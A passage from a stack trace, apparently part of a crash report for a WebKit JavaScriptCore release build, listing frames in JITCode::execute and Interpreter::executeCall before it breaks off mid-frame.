JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf7d47d)\r\n #19 0x106203aa3 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallDat